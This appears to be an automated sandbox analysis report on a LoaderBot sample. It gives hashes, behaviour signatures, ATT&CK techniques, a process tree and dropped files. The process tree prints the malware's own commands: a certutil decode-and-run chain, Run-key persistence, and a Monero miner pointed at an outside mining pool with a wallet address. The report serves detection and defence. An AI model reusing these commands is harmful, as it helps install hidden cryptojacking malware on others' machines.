loaderbot | c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0

Analysis

max time kernel
153s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe
Size

3.3MB
MD5

8607ba047abf1a8403746257cf1a89a8
SHA1

8618fb75f0ce49be1bd8443670bf5d211cbc36ea
SHA256

c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0
SHA512

62fb47cfd5e6428cb88c16234bf870485396b08c0be6411aeace6a23de63609348790dafc81154bc11dfbe7870849a30618f01af9c55db6f4259dca3e74d3dc4

Score

10^/10

loaderbot loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot

LoaderBot executable 1 IoCs

resource	yara_rule
behavioral2/memory/4008-143-0x0000000012D20000-0x0000000012FB2000-memory.dmp	loaderbot

Executes dropped EXE 3 IoCs

pid	Process
2596	rundll32.com
2360	rundll32.com
5040	Driver.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	rundll32.com

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\RegAsm.exe"	RegAsm.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2360 set thread context of 4008	2360	rundll32.com	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1284	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe
4008	RegAsm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
640	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4008	RegAsm.exe
Token: SeLockMemoryPrivilege	5040	Driver.exe
Token: SeLockMemoryPrivilege	5040	Driver.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2596	rundll32.com
2596	rundll32.com
2596	rundll32.com
2360	rundll32.com
2360	rundll32.com
2360	rundll32.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2596	rundll32.com
2596	rundll32.com
2596	rundll32.com
2360	rundll32.com
2360	rundll32.com
2360	rundll32.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4712 wrote to memory of 4392	4712	c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe	80
PID 4712 wrote to memory of 4392	4712	c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe	80
PID 4712 wrote to memory of 4392	4712	c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe	80
PID 4392 wrote to memory of 3176	4392	cmd.exe	82
PID 4392 wrote to memory of 3176	4392	cmd.exe	82
PID 4392 wrote to memory of 3176	4392	cmd.exe	82
PID 4392 wrote to memory of 2596	4392	cmd.exe	83
PID 4392 wrote to memory of 2596	4392	cmd.exe	83
PID 4392 wrote to memory of 2596	4392	cmd.exe	83
PID 2596 wrote to memory of 2360	2596	rundll32.com	84
PID 2596 wrote to memory of 2360	2596	rundll32.com	84
PID 2596 wrote to memory of 2360	2596	rundll32.com	84
PID 4392 wrote to memory of 1284	4392	cmd.exe	85
PID 4392 wrote to memory of 1284	4392	cmd.exe	85
PID 4392 wrote to memory of 1284	4392	cmd.exe	85
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93
PID 2360 wrote to memory of 4008	2360	rundll32.com	93

C:\Users\Admin\AppData\Local\Temp\c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe
"C:\Users\Admin\AppData\Local\Temp\c655f0c24956126ca407b915263187cc9a14433d8b8a5f60d553f26497cc9ed0.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c <nul set /p ="M" > rundll32.com & type eGuH.com >> rundll32.com & del eGuH.com & certutil -decode JphA.com D & rundll32.com D & ping 127.0.0.1 -n 30 & mkdir %appdata%\Sysfiles & echo > %appdata%\Sysfiles\RegAsm.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\SysWOW64\certutil.exe
    certutil -decode JphA.com D
    3⤵
    PID:3176
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com
    rundll32.com D
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com D
      4⤵
      Executes dropped EXE
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        5⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42PnsGPyCvdQVL7nt7LEKyZrMMy87vBDmdyqxZ12VZkQEzb8hf7sAMWTDeZeyFG1fYewMCyjRUn8H9XL9RUwSRUFAN7XYxf -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5040
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 30
    3⤵
    - Runs ping.exe
    PID:1284

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\D

Filesize
480KB

MD5
c757fc6104fef9d2f74d0115464c6900

SHA1
c7b786d2be079a2beb37545e064d133cab910cae

SHA256
4948be363f9a251c88e1d77c17cadbe9522fab2d8f1b77231f13a5721f0221dd

SHA512
ec6b6db1f694e999c3e18aa87b61bcc6b5dc8262d49dbc92ab47040c9153f4cdac334735ecc4e6650b3536255b242251fb94924a8ef432f7b594a0b475a119a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\JphA.com

Filesize
660KB

MD5
44fd1c2bfea313b27f2131afc9c4a08e

SHA1
d9dac60f68aa3fc362103e549e2fcf33c390e900

SHA256
41ae64c9b096617189341dd42ffe00a1f3ae2910ea26f9f70f1a9e5572c9675b

SHA512
25325b8b7965f140911d9ba8e50fdb2b04d57011726a1d9c8060785ae0531ad3ee853e4cb765f37945683d6d69fc269f991780956050fa15f703dd7f1357b5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eGuH.com

Filesize
872KB

MD5
d86ab2aeeac2553c7857ece4492eda5d

SHA1
0828db56b556f3f0486a9de9d2c728216035e8e6

SHA256
8861365fb619dbb90da0027db93d041681c30deb93071ec588121a8f8ba08436

SHA512
8c0154d80fb47ea5225816e95db0126d02950f0ec7909a68205ee67a0d1c4dbff971933ee5ba0307c24658ce52400e144cde720e514acf3024fbdb2505345cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rundll32.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uILTn.com

Filesize
2.5MB

MD5
94670a620b3dafb6e1df5f72c6dc6523

SHA1
a0973ffa8889a94a82678619fde8ff1d8dc7a308

SHA256
2336086400cf9e8d2d519a98d0d8ebd14bdd648d71e2950743e427b534bc1e78

SHA512
e0c404d9e3822c671eed1389e51ecee6af61305158d0edc3b4b50d866136a28214664b13aacd93272dff6ce3f61e3fa6bb45da1ca4e3427a88fbd1b6bcecc880

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
4.2MB

MD5
f39d62794a949649347d15e81b8ddb72

SHA1
3ae4cab5eae7ea5d0878db1058927259ad0cfe1e

SHA256
49d1e2cc8c03eb9297c187b65b7a28e7920f02220b54560b807e89d7394fd8e1

SHA512
640b3d808c9aa0394da49e17aca66dba2d75bf0fdb28e37c83c494393edd6a9c0d798796bd2527301ec45bbbf6d16b2145867929b89d6838eaab51fe08618a15

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
4.2MB

MD5
f39d62794a949649347d15e81b8ddb72

SHA1
3ae4cab5eae7ea5d0878db1058927259ad0cfe1e

SHA256
49d1e2cc8c03eb9297c187b65b7a28e7920f02220b54560b807e89d7394fd8e1

SHA512
640b3d808c9aa0394da49e17aca66dba2d75bf0fdb28e37c83c494393edd6a9c0d798796bd2527301ec45bbbf6d16b2145867929b89d6838eaab51fe08618a15

Download Submit
memory/4008-143-0x0000000012D20000-0x0000000012FB2000-memory.dmp

Filesize
2.6MB

Download
memory/4008-144-0x0000000018630000-0x0000000018696000-memory.dmp

Filesize
408KB

Download
memory/5040-148-0x00000000001D0000-0x00000000001E4000-memory.dmp

Filesize
80KB

Download
memory/5040-149-0x00000000004D0000-0x00000000004F0000-memory.dmp

Filesize
128KB

Download
memory/5040-150-0x00000000004F0000-0x0000000000510000-memory.dmp

Filesize
128KB

Download